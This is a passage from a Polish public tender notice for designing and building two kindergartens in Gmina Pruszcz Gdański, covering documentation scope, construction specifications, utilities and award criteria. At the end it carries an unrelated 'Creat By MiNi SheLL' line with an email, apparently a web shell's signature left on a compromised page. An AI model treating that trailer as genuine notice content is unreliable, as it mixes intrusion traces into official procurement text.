2.	Wykonać  mapę d/c projektowych dla obiektu oraz w zakresie niezbędnym do podłączenia mediów dla obiektu. 
3.	Uzyskać warunki techniczne od gestorów infrastruktury w imieniu Inwestora.
4.	Sporządzić  projekt budowlany  spełniający wymagania /Rozporządzenia Ministra Infrastruktury z dnia 2 września   2004r ( Dz.U. 2013.1129 j.t.) w sprawie szczegółowego zakresu i formy projektu budowlanego/ z wymaganymi uzgodnieniami i opiniami, gotowy i kompletny do złożenia w celu uzyskania pozwolenia na budowę.  Projekt należy wykonać w ilości 5 egzemplarzy  w formie pisemnej oraz 1 egz. w formie elektronicznej. 
UWAGA: przez wersję elektroniczną dokumentacji budowlanej , Zamawiający rozumie zeskanowaną ostateczną wersję dokumentacji papierowej, na podstawie której wystawiona zostanie decyzja pozwolenie na budowę. 
5.	Sporządzić projekty wykonawcze wszystkich  branż z uzgodnieniem szczegółowym materiałów budowlanych z Inwestorem) w tym także uzgodniony z Zamawiającym podstawowy projekt wnętrz wraz z kolorystyką w zakresie elementów wnętrz integralnie związanych z kompozycją architektoniczną. 
Projekty branż  należy wykonać w ilości 5 egzemplarzy  w formie pisemnej oraz 1 egz. w formie elektronicznej.  
6.	Ekspertyzy i badania niezbędne dla realizacji inwestycji w tym badania geotechniczne (wykonać w ilości 5 egzemplarzy  w formie pisemnej oraz 1 egz. w formie elektronicznej.
7.	Projekty  będą opracowane rozdzielnie  i będą zawierały: 
a)	plan zagospodarowania działki dla zakresu uzgodnionego z Inwestorem ale też niezbędnego do podłączenia mediów do obiektu, 
b)	branżowe projekty budowlano - wykonawcze : architekturę, konstrukcję, instalacje wewnętrzne wod - kan, w tym cwu, ciepła technologicznego dla wentylacji, CO, gaz, technologię kotłowni, wentylację mechaniczną, wentylację grawitacyjną wspomaganą,  elektryczną  oświetleniową i gniazdową w tym instalację wew. oświetlenia awaryjnego i zew. oświetleniową budynku  i instalację odgromową, instalacje teletechniczne : strukturalna, RTV, włamania i napadu, tv przemysłowa wew. i zew., telefoniczna, wideofonowa.
c)	inne niezbędne opracowania do projektu jak: odprowadzenie wód deszczowych, drenaż opaskowy,  ochrona p.poż, przełożenia istniejących sieci, przyłącza: wodociągowe, kanalizacji sanitarnej, elektryczne, telefoniczne, projekt drogowy dla utwardzeń ciągów pieszych i jezdnych wraz z projektem wjazdu z drogi gminnej  ul. Akacjowej , plac zabaw.
8.	Sporządzenie specyfikacji technicznej wykonania i odbioru robót  w ilości 2 egz. i w wersji elektronicznej  (stwior) zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września   2004r ( Dz.U. 2013.1129 j.t.) w sprawie szczegółowego zakresu i formy projektu budowlanego, specyfikacji technicznych wykonania i odbioru robót.
II ETAP 
Budowa budynku przedszkola / pod klucz/  wraz z instalacjami wewnętrznymi i przyłączami, wyposażeniem wg. załączonych wymagań PFU i zagospodarowaniem terenu wokół budynku.
W projektowanym budynku należy zlokalizować 4 oddziały przedszkola, każdy złożony z sali zajęć, sanitariatu przylegającego bezpośrednio do sal oddziału oraz pomieszczenia na leżaki przy jednej z sal / 3-latki/ . Wejście do szatni oddziałów z ogólnodostępnego holu  w strefie wejściowej. Oprócz oddziałów dla dzieci w budynku należy uwzględnić pomieszczenia administracyjno-socjalne, technologiczne pomieszczenie wydawalni posiłków /katering/ i techniczne takie jak kotłownia czy wentylatornia, magazynki, pom. porządkowe. 
Szacunkowa wielkość powierzchni użytkowej projektowanego obiektu to ok. 570 m2. 
Budynek przedszkola  należy zaprojektować w technologii  szkieletowej  z możliwie najkrótszym czasem budowy  budynku / pod klucz/.
Charakterystyka szczegółowa dla budynku:
1)	fundamenty - żelbetowe ławy, wylewane,
2)	ściany fundamentowe - bloczki betonowe,  ocieplone  polistyrenem ekstrudowanym i płytki elewacyjne,
3)	ściany zew. -  szkieletowe wielowarstwowe, w tym płyta GKF+ ocieplenie, paroizolacje + płyta + tynk ,
4)	ściany wew. konstr.- szkieletowe wielowarstwowe ,
5)	ścianki działowe - szkieletowe wielowarstwowe    
6)	wieńce, podciągi nadproża-  w konstrukcji szkieletu, obudowane
7)	kanały wentylacji mechanicznej - blaszane ocieplone
8)	kanały wentylacji grawitacyjnej  - pcv ocieplone 
9)	konstrukcja dachowa  - drewniane dźwigary, deskowanie, ocieplenie wełna mineralna ,paraizolacja,  pokrycie blacha powlekana kolor, płotki przeciśniegowe, stopnie i ławki kominiarskie,  sufit  podwieszony na rusztach met. kasetonowy, podbitka drewniana.
10)	zadaszenia nad wejściami  - blacha na konstrukcji drewnianej,
11)	stolarka okienna - PCV  kolor biały, 
12)	stolarka drzwiowa - płytowe wzmocnione wew  kolorowe  , WC - systemowe z płyt laminatu kolorowe , aluminiowe zew. wejściowe kolor , z zamkami 2szt i samozamykaczem, szyby bezpieczne obustronnie, do kotłowni  stalowe  zewnętrzne ocieplone, 
13)	opierzenia, rynny , rury spustowe blaszane z blachy powlekane,
14)	instalacje wewnętrzne : grzewcza, wod- kan i ciepłej wody,  woda technologiczna, wentylacje mechaniczna, elektryczna, gazowa, wlz .  Teletechniczna : system telewizji dozorowej, system sygnalizacji włamania i napadu, strukturalna, telefoniczna, RTV, wideofonowa,
technologia kotłowni -  kocioł gazowy kondensacyjny dwufunkcyjny z automatyką z wewnętrzną komorą spalania, komin systemowy. 
Przyłącza do budynku :
a)	wodociągowe - zgodnie z warunkami technicznymi, studzienka wodomierzowa z opomiarowaniem,
b)	sanitarne - włączenie się do istniejącej sieci kanalizacji sanitarnej na działce, rury PCV,  
c)	deszczowe - drenaż opaskowy z rur drenarskich PCV w oplocie, odwodnienie wód opadowych z dachu, z placu i drogi, włączenie się do istn. kd na działce, rurociągi  PCV, studnie betonowe z osadnikiem i  PCV 
d)	gazowe - zgodnie z warunkami technicznymi, 
e)	telefoniczne - zgodnie z warunkami technicznymi,
f)	elektryczne - zgodnie z warunkami technicznymi
Zagospodarowanie terenu :
a)  wjazd i droga  wew. / p.poż/  z szer. 5m z betonowej kostki szarej gr.8cm,
b) chodniki - z kostki betonowej koloru czerwonego gr.6cm,
c)  plac przed budynkiem z kostki szarej gr. 8cm,
d)  ogrodzony plac zabaw z montażem urządzeń istn. do przeniesienia,
e)  tereny  zielone :  humusowanie i obsianie trawą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 45.20.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres udzielonej rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> budowa 8-oddziałowego przedszkola w Straszynie przy ul. Pocztowej, Gmina Pruszcz Gd..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  budowa przedszkola 8-oddziałowego  /pod klucz/, w tym : opracowanie kompleksowej dokumentacji projektowej, uzyskanie pozwolenia na budowę i wykonanie budynku wraz z wyposażeniem w zakresie budowy, uzbrojeniem i zagospodarowaniem terenu w Straszynie przy ul. Pocztowej, Gm. Pruszczu Gdańskim, 
Inwestycję zaplanowano w Straszynie przy ul. Pocztowej na działkach nr nr 256/8; 256/7; 256/6; 256/5; 256/3;  o  powierzchni całkowitej 3 859m2, działki stanowią własność Gminy Pruszcz  Gdański.
Obszar planowany na lokalizację przedszkola określony został w załączniku nr 9a do SIWZ - plan (szkic) sytuacyjny lokalizacji inwestycji.
Inwestycję wykonać w dwóch etapach, w formule /zaprojektuj i wybuduj/.
I ETAP
Wykonać wielobranżową dokumentacje techniczną  i uzyskać pozwolenie na budowę dla obiektu pn.  /Budowa przedszkola 8-oddziałowego w Straszynie przy ul. Pocztowej / - Inwestor Gmina Pruszcz Gdański.
Szczegółowy zakres opracowania do części projektowej  przedmiotu  zamówienia wg. wymagań załączonego programu funkcjonalno-użytkowego : 
1.	Wykonać koncepcję architektoniczną ( 2 egz.) budynku przedszkola  wg. wymagań  programu funkcjonalno-użytkowego wraz z  zagospodarowaniem działki w obrębie obiektu oraz  uzyskanie akceptacji  Inwestora.
2.	Wykonać  mapę d/c projektowych dla obiektu oraz w zakresie niezbędnym do podłączenia mediów dla obiektu. 
3.	Uzyskać warunki techniczne od gestorów infrastruktury w imieniu Inwestora.
4.	Sporządzić  projekt budowlany  spełniający wymagania /Rozporządzenia Ministra Infrastruktury z dnia 2 września   2004r ( Dz.U. 2013.1129 j.t.) w sprawie szczegółowego zakresu i formy projektu budowlanego/ z wymaganymi uzgodnieniami i opiniami, gotowy i kompletny do złożenia w celu uzyskania pozwolenia na budowę.  Projekt należy wykonać w ilości 5 egzemplarzy  w formie pisemnej oraz 1 egz. w formie elektronicznej. 
UWAGA : przez wersję elektroniczną dokumentacji budowlanej , Zamawiający rozumie zeskanowaną ostateczną wersję dokumentacji papierowej, na podstawie której wystawiona zostanie decyzja pozwolenie na budowę. 
5.	Sporządzić projekty wykonawcze wszystkich  branż z uzgodnieniem szczegółowym materiałów budowlanych z Inwestorem) w tym także uzgodniony z Zamawiającym podstawowy projekt wnętrz wraz z kolorystyką w zakresie elementów wnętrz integralnie związanych z kompozycją architektoniczną. 
Projekty branż  należy wykonać w ilości 5 egzemplarzy  w formie pisemnej oraz 1 egz. w formie elektronicznej.  
6.	Ekspertyzy i badania niezbędne dla realizacji inwestycji w tym badania geotechniczne (wykonać w ilości 5 egzemplarzy  w formie pisemnej oraz 1 egz. w formie elektronicznej.
 
7.	Projekty  będą opracowane rozdzielnie  i będą zawierały : 
a)	plan zagospodarowania działki dla zakresu uzgodnionego z Inwestorem ale też niezbędnego do podłączenia mediów do  obiektu, 
b)	branżowe projekty budowlano - wykonawcze : architekturę, konstrukcję, instalacje wewnętrzne wod - kan, w tym cwu, ciepła technologicznego dla wentylacji, CO, gaz, technologię kotłowni, wentylację mechaniczną, wentylację grawitacyjną wspomaganą,  elektryczną  oświetleniową i gniazdową w tym instalację wew. oświetlenia awaryjnego i zew. oświetleniową budynku  i instalację odgromową, instalacje teletechniczne : strukturalna, RTV, włamania i napadu, tv przemysłowa wew. i zew., telefoniczna, wideofonowa.
c)	inne niezbędne opracowania do projektu jak: odprowadzenie wód deszczowych, operat wodnoprawny, drenaż opaskowy,  ochrona p.poż,  przełożenia istniejących sieci, przyłącza wodociągowego, kanalizacji sanitarnej, elektrycznego, telefonicznego, projekt drogowy dla utwardzeń ciągów pieszych i jezdnych wraz z projektem wjazdu z drogi gminnej  ul. Pocztowej. .
8.	Sporządzenie specyfikacji technicznej wykonania i odbioru robót  w ilości 2 egz. i w wersji elektronicznej  (stwior) zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września   2004r ( Dz.U. 2013.1129 j.t.) w sprawie szczegółowego zakresu i formy projektu budowlanego, specyfikacji technicznych wykonania i odbioru robót.
II ETAP 
Budowa budynku przedszkola / pod klucz/  wraz z instalacjami wewnętrznymi i przyłączami, wyposażeniem wg. załączonych wymagań PFU i zagospodarowaniem terenu wokół budynku.
 W projektowanym budynku należy zlokalizować 8 oddziałów przedszkola, każdy złożony z sali zajęć, sanitariatu przylegającego bezpośrednio do sal oddziału oraz pomieszczenia na leżaki przy dwóch salach / 3-latki/ . Wejście do szatni oddziałów z ogólnodostępnego holu  w strefie wejściowej. Oprócz oddziałów dla dzieci w budynku należy uwzględnić pomieszczenia administracyjno-socjalne, technologiczne pomieszczenie wydawalni posiłków /katering / i techniczne takie jak kotłownia czy wentylatornia, magazynki, pom. porządkowe. 
Szacunkowa wielkość powierzchni użytkowej projektowanego obiektu to ok. 1 000 m2. 
Budynek przedszkola  należy zaprojektować w technologii  szkieletowej  z możliwie najkrótszym czasem budowy  budynku / pod klucz/.
Charakterystyka szczegółowa dla budynku:
1)	fundamenty - żelbetowe ławy, wylewane,
2)	ściany fundamentowe - bloczki betonowe,  ocieplone  polistyrenem ekstrudowanym i płytki elewacyjne,
3)	ściany zew. -  szkieletowe wielowarstwowe, w tym szkielet konstrukcyjny, płyta GKF+ ocieplenie, paroizolacje + płyta + tynk ,
4)	ściany wew. konstr.- szkieletowe wielowarstwowe ,
5)	ścianki działowe - szkieletowe wielowarstwowe    
6)	wieńce, podciągi nadproża-  w konstrukcji szkieletu, obudowane
7)	kanały wentylacji mechanicznej - blaszane ocieplone
8)	kanały wentylacji grawitacyjnej  - pcv ocieplone 
9)	konstrukcja dachowa  - drewniane dźwigary, deskowanie, ocieplenie wełna mineralna ,paraizolacja,  pokrycie blacha powlekana kolor, płotki przeciśniegowe, stopnie i ławki kominiarskie,  sufit  podwieszony na rusztach met. kasetonowy,
10)	zadaszenia nad wejściami  - blacha na konstrukcji drewnianej,
11)	stolarka okienna - PCV  kolor biały, 
12)	stolarka drzwiowa - płytowe wzmocnione wew  kolorowe  , WC - systemowe z płyt laminatu kolorowe , aluminiowe zew. wejściowe kolor , z zamkami 2szt i samozamykaczem, szyby bezpieczne obustronnie, do kotłowni  stalowe  zewnętrzne ocieplone, 
13)	opierzenia, rynny, rury spustowe blaszane z blachy powlekanej.
14)	instalacje wewnętrzne : grzewcza, wod- kan i ciepłej wody,  woda technologiczna, wentylacje mechaniczna, elektryczna, gazowa, wlz .  Teletechniczna : system telewizji dozorowej, system sygnalizacji włamania i napadu, strukturalna, telefoniczna, RTV, wideofonowa,
technologia kotłowni -  kocioł gazowy kondensacyjny dwufunkcyjny z automatyką z wewnętrzną komorą spalania, komin systemowy. 
Przyłącza do budynku :
a)	wodociągowe - zgodnie z warunkami technicznymi, studzienka wodomierzowa z opomiarowaniem,
b)	sanitarne - włączenie się do istniejącej sieci kanalizacji sanitarnej na działce, rury PCV,  
c)	deszczowe - drenaż opaskowy z rur drenarskich PCV w oplocie, odwodnienie wód opadowych z dachu, z placu i drogi, włączenie się do istn. kd w ul. Pocztowej, rurociągi  PCV, studnie betonowe z osadnikiem i  PCV 
d)	gazowe - zgodnie z warunkami technicznymi, 
e)	telefoniczne - zgodnie z warunkami technicznymi,
f)	elektryczne - zgodnie z warunkami technicznymi
Zagospodarowanie terenu :
a)	wjazd asfaltowy  z obustronnym chodnikiem szer. 2,5m i droga  wew. szer. 5m z zawrotką  / p.poż/  z betonowej kostki szarej  gr.8cm,
b)	chodniki, schody terenowe- z kostki betonowej koloru szarego szer. 2m,  gr.6cm, barierki stalowe przy schodach terenowych obustronnie,
c)	plac przed budynkiem z kostki szarej gr. 8cm,
d)	ogrodzenie  działki po scaleniu - systemowe wys. 1,5m, cokół betonowy systemowy, brama szer. 5 m  dwudzielna otwierana mechanicznie, furtki szer . 1m szt. 2
e)	tereny  zielone :  humusowanie i obsianie trawą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 45.20.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres udzielonej rękojmi - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com